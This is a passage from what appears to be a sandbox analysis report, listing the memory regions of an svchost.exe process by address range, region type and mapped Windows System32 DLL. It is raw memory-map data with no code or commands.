(normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 6024 start_va = 0xb43dd00000 end_va = 0xb43dd03fff entry_point = 0xb43dd00000 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 6025 start_va = 0xb43ddf0000 end_va = 0xb43ddf6fff entry_point = 0x0 region_type = private name = "private_0x000000b43ddf0000" filename = "" Region: id = 6026 start_va = 0xb43de00000 end_va = 0xb43defffff entry_point = 0x0 region_type = private name = "private_0x000000b43de00000" filename = "" Region: id = 6027 start_va = 0xb43df00000 end_va = 0xb43dffffff entry_point = 0x0 region_type = private name = "private_0x000000b43df00000" filename = "" Region: id = 6028 start_va = 0xb43e000000 end_va = 0xb43e0fffff entry_point = 0x0 region_type = private name = "private_0x000000b43e000000" filename = "" Region: id = 6029 start_va = 0xb43e900000 end_va = 0xb43e9fffff entry_point = 0x0 region_type = private name = "private_0x000000b43e900000" filename = "" Region: id = 6030 start_va = 0xb43ea00000 end_va = 0xb43eafffff entry_point = 0x0 region_type = private name = "private_0x000000b43ea00000" filename = "" Region: id = 6031 start_va = 0xb43eb00000 end_va = 0xb43ebfffff entry_point = 0x0 region_type = private name = "private_0x000000b43eb00000" filename = "" Region: id = 6032 start_va = 0xb43ed00000 end_va = 0xb43ed7ffff entry_point = 0x0 region_type = private name = "private_0x000000b43ed00000" filename = "" Region: id = 6033 start_va = 0xb43f080000 end_va = 0xb43f17ffff entry_point = 0x0 region_type = private name = "private_0x000000b43f080000" filename = "" Region: id = 6034 start_va = 0x7df5fff20000 end_va = 0x7ff5fff1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff20000" filename = "" Region: id = 6035 start_va = 0x7ff6e00bc000 end_va = 0x7ff6e00bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00bc000" filename = "" Region: id = 6036 start_va = 0x7ff6e00c4000 end_va = 0x7ff6e00c5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00c4000" filename = "" Region: id = 6037 start_va = 0x7ff6e00c8000 end_va = 0x7ff6e00c9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00c8000" filename = "" Region: id = 6038 start_va = 0x7ff6e00ca000 end_va = 0x7ff6e00cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00ca000" filename = "" Region: id = 6039 start_va = 0x7ff6e00ce000 end_va = 0x7ff6e00cffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00ce000" filename = "" Region: id = 6040 start_va = 0x7ff6e00de000 end_va = 0x7ff6e00dffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00de000" filename = "" Region: id = 6041 start_va = 0x7ff6e00e0000 end_va = 0x7ff6e00e1fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00e0000" filename = "" Region: id = 6042 start_va = 0x7ff6e00e2000 end_va = 0x7ff6e00e3fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00e2000" filename = "" Region: id = 6043 start_va = 0x7ff6e00e4000 end_va = 0x7ff6e00e5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00e4000" filename = "" Region: id = 6044 start_va = 0x7ff6e00e8000 end_va = 0x7ff6e00e9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00e8000" filename = "" Region: id = 6045 start_va = 0x7ff6e00ea000 end_va = 0x7ff6e00ebfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00ea000" filename = "" Region: id = 6046 start_va = 0x7ff6e00ec000 end_va = 0x7ff6e00edfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00ec000" filename = "" Region: id = 6047 start_va = 0x7ff6e00ee000 end_va = 0x7ff6e00effff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00ee000" filename = "" Region: id = 6048 start_va = 0x7ff6e00f0000 end_va = 0x7ff6e00f1fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00f0000" filename = "" Region: id = 6049 start_va = 0x7ff6e00f2000 end_va = 0x7ff6e00f3fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00f2000" filename = "" Region: id = 6050 start_va = 0x7ff6e00f4000 end_va = 0x7ff6e00f5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00f4000" filename = "" Region: id = 6051 start_va = 0x7ff6e00f6000 end_va = 0x7ff6e00f7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00f6000" filename = "" Region: id = 6052 start_va = 0x7ff6e00f8000 end_va = 0x7ff6e00f9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00f8000" filename = "" Region: id = 6053 start_va = 0x7ff6e00fa000 end_va = 0x7ff6e00fbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00fa000" filename = "" Region: id = 6054 start_va = 0x7ff6e00fc000 end_va = 0x7ff6e00fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00fc000" filename = "" Region: id = 6055 start_va = 0x7ff6e00fe000 end_va = 0x7ff6e00fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00fe000" filename = "" Region: id = 6056 start_va = 0x7ff6e0100000 end_va = 0x7ff6e0101fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0100000" filename = "" Region: id = 6057 start_va = 0x7ff6e0102000 end_va = 0x7ff6e0103fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0102000" filename = "" Region: id = 6058 start_va = 0x7ff6e0106000 end_va = 0x7ff6e0107fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0106000" filename = "" Region: id = 6059 start_va = 0x7ff6e0108000 end_va = 0x7ff6e0109fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0108000" filename = "" Region: id = 6060 start_va = 0x7ff6e010a000 end_va = 0x7ff6e010bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e010a000" filename = "" Region: id = 6061 start_va = 0x7ff6e010c000 end_va = 0x7ff6e010dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e010c000" filename = "" Region: id = 6062 start_va = 0x7ff6e010e000 end_va = 0x7ff6e010ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e010e000" filename = "" Region: id = 6063 start_va = 0x7ff6e0110000 end_va = 0x7ff6e0111fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0110000" filename = "" Region: id = 6064 start_va = 0x7ff6e0112000 end_va = 0x7ff6e0113fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0112000" filename = "" Region: id = 6065 start_va = 0x7ff6e0114000 end_va = 0x7ff6e0115fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0114000" filename = "" Region: id = 6066 start_va = 0x7ff6e0116000 end_va = 0x7ff6e0117fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0116000" filename = "" Region: id = 6067 start_va = 0x7ff6e0118000 end_va = 0x7ff6e0119fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0118000" filename = "" Region: id = 6068 start_va = 0x7ff6e011a000 end_va = 0x7ff6e011bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e011a000" filename = "" Region: id = 6069 start_va = 0x7ff6e011c000 end_va = 0x7ff6e011dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e011c000" filename = "" Region: id = 6070 start_va = 0x7ff6e011e000 end_va = 0x7ff6e011ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e011e000" filename = "" Region: id = 6071 start_va = 0x7ff6e0120000 end_va = 0x7ff6e0121fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0120000" filename = "" Region: id = 6072 start_va = 0x7ff6e0122000 end_va = 0x7ff6e0123fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0122000" filename = "" Region: id = 6073 start_va = 0x7ff6e0124000 end_va = 0x7ff6e0125fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0124000" filename = "" Region: id = 6074 start_va = 0x7ff6e0126000 end_va = 0x7ff6e0127fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0126000" filename = "" Region: id = 6075 start_va = 0x7ff6e012a000 end_va = 0x7ff6e012bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e012a000" filename = "" Region: id = 6076 start_va = 0x7ff6e012e000 end_va = 0x7ff6e012ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e012e000" filename = "" Region: id = 6077 start_va = 0x7ff6e0130000 end_va = 0x7ff6e0131fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0130000" filename = "" Region: id = 6078 start_va = 0x7ff6e0132000 end_va = 0x7ff6e0133fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0132000" filename = "" Region: id = 6079 start_va = 0x7ff6e0138000 end_va = 0x7ff6e0139fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0138000" filename = "" Region: id = 6080 start_va = 0x7ff6e013c000 end_va = 0x7ff6e013dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e013c000" filename = "" Region: id = 6081 start_va = 0x7ff6e0140000 end_va = 0x7ff6e0141fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0140000" filename = "" Region: id = 6082 start_va = 0x7ff6e0142000 end_va = 0x7ff6e0143fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0142000" filename = "" Region: id = 6083 start_va = 0x7ff6e0144000 end_va = 0x7ff6e0145fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0144000" filename = "" Region: id = 6084 start_va = 0x7ff6e0146000 end_va = 0x7ff6e0147fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0146000" filename = "" Region: id = 6085 start_va = 0x7ff6e0148000 end_va = 0x7ff6e0149fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0148000" filename = "" Region: id = 6086 start_va = 0x7ff6e014c000 end_va = 0x7ff6e014dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e014c000" filename = "" Region: id = 6087 start_va = 0x7ff6e014e000 end_va = 0x7ff6e014ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e014e000" filename = "" Region: id = 6088 start_va = 0x7ff6e0150000 end_va = 0x7ff6e0151fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0150000" filename = "" Region: id = 6089 start_va = 0x7ff6e0152000 end_va = 0x7ff6e0153fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0152000" filename = "" Region: id = 6090 start_va = 0x7ff6e0154000 end_va = 0x7ff6e0155fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0154000" filename = "" Region: id = 6091 start_va = 0x7ff6e0156000 end_va = 0x7ff6e0157fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0156000" filename = "" Region: id = 6092 start_va = 0x7ff6e0158000 end_va = 0x7ff6e0159fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0158000" filename = "" Region: id = 6093 start_va = 0x7ff6e015a000 end_va = 0x7ff6e015bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e015a000" filename = "" Region: id = 6094 start_va = 0x7ff6e015c000 end_va = 0x7ff6e015dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e015c000" filename = "" Region: id = 6095 start_va = 0x7ff6e015e000 end_va = 0x7ff6e015ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e015e000" filename = "" Region: id = 6096 start_va = 0x7ff6e0160000 end_va = 0x7ff6e025ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0160000" filename = "" Region: id = 6097 start_va = 0x7ff6e0260000 end_va = 0x7ff6e0282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0260000" filename = "" Region: id = 6098 start_va = 0x7ff6e0283000 end_va = 0x7ff6e0284fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0283000" filename = "" Region: id = 6099 start_va = 0x7ff6e0285000 end_va = 0x7ff6e0286fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0285000" filename = "" Region: id = 6100 start_va = 0x7ff6e0287000 end_va = 0x7ff6e0288fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0287000" filename = "" Region: id = 6101 start_va = 0x7ff6e0289000 end_va = 0x7ff6e028afff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0289000" filename = "" Region: id = 6102 start_va = 0x7ff6e028d000 end_va = 0x7ff6e028efff entry_point = 0x0 region_type = private name = "private_0x00007ff6e028d000" filename = "" Region: id = 6103 start_va = 0x7ff6e028f000 end_va = 0x7ff6e028ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e028f000" filename = "" Region: id = 6104 start_va = 0x7ff6e1100000 end_va = 0x7ff6e110cfff entry_point = 0x7ff6e1100000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 6105 start_va = 0x7ffc3ea80000 end_va = 0x7ffc3ed2ffff entry_point = 0x7ffc3ea80000 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 6106 start_va = 0x7ffc3f680000 end_va = 0x7ffc3f7a1fff entry_point = 0x7ffc3f680000 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 6107 start_va = 0x7ffc3ff50000 end_va = 0x7ffc3ff9cfff entry_point = 0x7ffc3ff50000 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 6108 start_va = 0x7ffc40ea0000 end_va = 0x7ffc410c9fff entry_point = 0x7ffc40ea0000 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 6109 start_va = 0x7ffc41e90000 end_va = 0x7ffc41f13fff entry_point = 0x7ffc41e90000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 6110 start_va = 0x7ffc423b0000 end_va = 0x7ffc423d7fff entry_point = 0x7ffc423b0000 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 6111 start_va = 0x7ffc44450000 end_va = 0x7ffc446c6fff entry_point = 0x7ffc44450000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 6112 start_va = 0x7ffc467a0000 end_va = 0x7ffc467b1fff entry_point = 0x7ffc467a0000 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 6113 start_va = 0x7ffc46950000 end_va = 0x7ffc469b5fff entry_point = 0x7ffc46950000 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 6114 start_va = 0x7ffc46a70000 end_va = 0x7ffc46a7afff entry_point = 0x7ffc46a70000 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 6115 start_va = 0x7ffc46a80000 end_va = 0x7ffc46ba0fff entry_point = 0x7ffc46a80000 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 6116 start_va = 0x7ffc46d10000 end_va = 0x7ffc46d22fff entry_point = 0x7ffc46d10000 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 6117 start_va = 0x7ffc484a0000 end_va = 0x7ffc484b4fff entry_point = 0x7ffc484a0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 6118 start_va = 0x7ffc484c0000 end_va = 0x7ffc484d9fff entry_point = 0x7ffc484c0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 6119 start_va = 0x7ffc484e0000 end_va = 0x7ffc484ecfff entry_point = 0x7ffc484e0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 6120 start_va = 0x7ffc48ff0000 end_va = 0x7ffc49459fff entry_point = 0x7ffc48ff0000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 6121 start_va = 0x7ffc494a0000 end_va = 0x7ffc49522fff entry_point = 0x7ffc494a0000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 6122 start_va = 0x7ffc49530000 end_va = 0x7ffc49540fff entry_point = 0x7ffc49530000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 6123 start_va = 0x7ffc49550000 end_va = 0x7ffc49565fff entry_point = 0x7ffc49550000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 6124 start_va = 0x7ffc49570000 end_va = 0x7ffc49647fff entry_point = 0x7ffc49570000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 6125 start_va = 0x7ffc49650000 end_va = 0x7ffc496b2fff entry_point = 0x7ffc49650000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 6126 start_va = 0x7ffc496c0000 end_va = 0x7ffc496e4fff entry_point = 0x7ffc496c0000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 6127 start_va = 0x7ffc496f0000 end_va = 0x7ffc49703fff entry_point = 0x7ffc496f0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 6128 start_va = 0x7ffc49710000 end_va = 0x7ffc49807fff entry_point = 0x7ffc49710000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 6129 start_va = 0x7ffc49810000 end_va = 0x7ffc49882fff entry_point = 0x7ffc49810000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 6130 start_va = 0x7ffc49890000 end_va = 0x7ffc499c6fff entry_point = 0x7ffc49890000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 6131 start_va = 0x7ffc4a100000 end_va = 0x7ffc4a17ffff entry_point = 0x7ffc4a100000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 6132 start_va = 0x7ffc4a370000 end_va = 0x7ffc4a380fff entry_point = 0x7ffc4a370000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 6133 start_va = 0x7ffc4a390000 end_va = 0x7ffc4a3a0fff entry_point = 0x7ffc4a390000 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 6134 start_va = 0x7ffc4a3b0000 end_va = 0x7ffc4a42ffff entry_point = 0x7ffc4a3b0000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 6135 start_va = 0x7ffc4a480000 end_va = 0x7ffc4a491fff entry_point = 0x7ffc4a480000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 6136 start_va = 0x7ffc4a4e0000 end_va = 0x7ffc4a525fff entry_point = 0x7ffc4a4e0000 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 6137 start_va = 0x7ffc4a530000 end_va = 0x7ffc4a56ffff entry_point = 0x7ffc4a530000 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 6138 start_va = 0x7ffc4a570000 end_va = 0x7ffc4a5b7fff entry_point = 0x7ffc4a570000 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 6139 start_va = 0x7ffc4a6b0000 end_va = 0x7ffc4a6c6fff entry_point = 0x7ffc4a6b0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6140 start_va = 0x7ffc4b090000 end_va = 0x7ffc4b09dfff entry_point = 0x7ffc4b090000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 6141 start_va = 0x7ffc4b0e0000 end_va = 0x7ffc4b0f0fff entry_point = 0x7ffc4b0e0000 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 6142 start_va = 0x7ffc4b170000 end_va = 0x7ffc4b1cefff entry_point = 0x7ffc4b170000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 6143 start_va = 0x7ffc4b290000 end_va = 0x7ffc4b536fff entry_point = 0x7ffc4b290000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 6144 start_va = 0x7ffc4b6e0000 end_va = 0x7ffc4b6ebfff entry_point = 0x7ffc4b6e0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 6145 start_va = 0x7ffc4b890000 end_va = 0x7ffc4b899fff entry_point = 0x7ffc4b890000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 6146 start_va = 0x7ffc4b8c0000 end_va = 0x7ffc4b8d4fff entry_point = 0x7ffc4b8c0000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 6147 start_va = 0x7ffc4b8e0000 end_va = 0x7ffc4b920fff entry_point = 0x7ffc4b8e0000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 6148 start_va = 0x7ffc4b930000 end_va = 0x7ffc4bc6cfff entry_point = 0x7ffc4b930000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 6149 start_va = 0x7ffc4bc70000 end_va = 0x7ffc4bf51fff entry_point = 0x7ffc4bc70000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 6150 start_va = 0x7ffc4bfa0000 end_va = 0x7ffc4bfbcfff entry_point = 0x7ffc4bfa0000 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 6151 start_va = 0x7ffc4bfc0000 end_va = 0x7ffc4c023fff entry_point = 0x7ffc4bfc0000 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 6152 start_va = 0x7ffc4c030000 end_va = 0x7ffc4c044fff entry_point = 0x7ffc4c030000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 6153 start_va = 0x7ffc4c110000 end_va = 0x7ffc4c1aefff entry_point = 0x7ffc4c110000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 6154 start_va = 0x7ffc4c1b0000 end_va = 0x7ffc4c20afff entry_point = 0x7ffc4c1b0000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 6155 start_va = 0x7ffc4c220000 end_va = 0x7ffc4c25efff entry_point = 0x7ffc4c220000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 6156 start_va = 0x7ffc4c270000 end_va = 0x7ffc4c279fff entry_point = 0x7ffc4c270000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 6157 start_va = 0x7ffc4c280000 end_va = 0x7ffc4c2adfff entry_point = 0x7ffc4c280000 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 6158 start_va = 0x7ffc4c2b0000 end_va = 0x7ffc4c30cfff entry_point = 0x7ffc4c2b0000 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 6159 start_va = 0x7ffc4c310000 end_va = 0x7ffc4c32ffff entry_point = 0x7ffc4c310000 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 6160 start_va = 0x7ffc4c330000 end_va = 0x7ffc4c337fff entry_point = 0x7ffc4c330000 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 6161 start_va = 0x7ffc4c340000 end_va = 0x7ffc4c350fff entry_point = 0x7ffc4c340000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 6162 start_va = 0x7ffc4c360000 end_va = 0x7ffc4c3f6fff entry_point = 0x7ffc4c360000 region_type = mapped_file name = "settingsync.dll" filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll") Region: id = 6163 start_va = 0x7ffc4c400000 end_va = 0x7ffc4c44bfff entry_point = 0x7ffc4c400000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 6164 start_va = 0x7ffc4c5e0000 end_va = 0x7ffc4c5f7fff entry_point = 0x7ffc4c5e0000 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 6165 start_va = 0x7ffc4c600000 end_va = 0x7ffc4c622fff entry_point = 0x7ffc4c600000 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 6166 start_va = 0x7ffc4c630000 end_va = 0x7ffc4c674fff entry_point = 0x7ffc4c630000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 6167 start_va = 0x7ffc4c680000 end_va = 0x7ffc4c770fff entry_point = 0x7ffc4c680000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 6168 start_va = 0x7ffc4ce60000 end_va = 0x7ffc4ce6afff entry_point = 0x7ffc4ce60000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 6169 start_va = 0x7ffc4cf60000 end_va = 0x7ffc4cf73fff entry_point = 0x7ffc4cf60000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: 